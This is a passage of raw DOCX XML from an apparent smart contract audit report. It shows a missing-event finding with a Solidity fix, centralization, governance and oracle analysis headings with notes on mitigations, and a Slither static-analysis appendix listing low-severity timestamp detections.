        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Reduced transparency for DAO participants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C6E2A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Harder incident response and audit trails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2B049D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305D068E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>N/A (observational); subgraph would miss feeBps updates without eth_getLogs decoding storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955CA5D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1399077A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>event FeeBpsUpdated(uint256 oldFeeBps, uint256 newFeeBps);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C0897E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25678D21" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>function setFeeBps(uint256 newFeeBps) external onlyOwner {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109DE31D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint256 old = feeBps;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E84E3" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    feeBps = newFeeBps;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCB887" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    emit FeeBpsUpdated(old, newFeeBps);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45129BB9" w14:textId="3B9FF87F" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23888160" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFE524E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>6. Centralization Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D61E67" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2928749D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A1841D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3250F7" wp14:editId="7CAD6076">
            <wp:extent cx="5734050" cy="2278380"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="119996810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68100" name="Рисунок 119996810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4050" cy="2278380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A0FF2" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA63BBA" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations in place:</w:t>
      </w:r>
      <w:r>
        <w:t> Timelock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2-day</w:t>
      </w:r>
      <w:r>
        <w:t> minimum delay; governor ownership of token contract after deploy; deployer renounces Timelock admin; UUPS _authorizeUpgrade restricted to owner (intended: Timelock). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Residual:</w:t>
      </w:r>
      <w:r>
        <w:t> testnet deployer historically owned treasury during bootstrap — acceptable for Sepolia only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2448F" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0972B5" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EA6DF9" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73ADB573" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32614B36" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059E840A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Governance Attack Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792850AB" w14:textId="01825236" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F98A2E0" wp14:editId="0F3B9AC6">
            <wp:extent cx="5734050" cy="2261870"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="174259136"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9136" name="Рисунок 17425913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4050" cy="2261870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2403A2B5" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A8D723" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>8. Oracle Attack Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1DB4F" w14:textId="092B33E6" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5972BD1E" wp14:editId="5D43DB29">
            <wp:extent cx="5734050" cy="1505585"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="79425795"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5795" name="Рисунок 7942579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4050" cy="1505585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED401E4" w14:textId="045BCA38" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Testnet caveat: deploy script may instantiate MockV3Aggregator when CHAINLINK_ETH_USD_FEED is unset — acceptable for Arbitrum Sepolia demo only; mainnet must use canonical Chainlink feed addresses and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7FAC6B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505340AF" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>9. Appendix — Slither Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDC9C9" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B68E77" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command: slither . --filter-paths "lib|test|script" (forge build --build-info --skip ./test/** ./script/** --force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50843EA0" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C636054" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analyzed 91 contracts with 101 detectors. 15 results found. Zero High, Zero Medium findings. Summary by detector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636055" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detector: timestamp (Low) — 9 results — Acknowledged (S-05)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636056" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMMPool.swapExactTokensForTokens — block.timestamp &gt; deadline (AMMPool.sol#93)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636057" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool.liquidate — debt &lt; 1 || _isHealthy(borrower) (LendingPool.sol#130)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636058" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool.healthFactor — debt &lt; 1 (LendingPool.sol#152)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636059" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool._accrueInterest — elapsed &lt; 1 (LendingPool.sol#166)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63605A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool._totalDebt — account.principal &lt; 1 (LendingPool.sol#175)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63605B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool._collateralValueInBorrowAsset — amount &lt; 1 (LendingPool.sol#184)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63605C" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool._withinLtv — newDebt &lt;= maxBorrow (LendingPool.sol#206)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63605D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LendingPool._isHealthy — healthFactor(user) &gt;= BPS (LendingPool.sol#210)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63605E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
